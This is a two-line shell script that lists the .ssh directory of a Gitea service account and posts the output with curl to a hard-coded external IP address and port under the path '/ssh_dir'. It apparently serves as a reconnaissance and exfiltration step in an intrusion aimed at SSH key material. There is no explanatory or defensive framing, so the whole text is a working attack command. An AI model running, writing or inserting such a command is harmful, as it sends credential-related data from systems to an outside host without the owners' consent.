#!/bin/sh
ls -la /var/packages/gitea/var/data/home/.ssh/ 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/ssh_dir
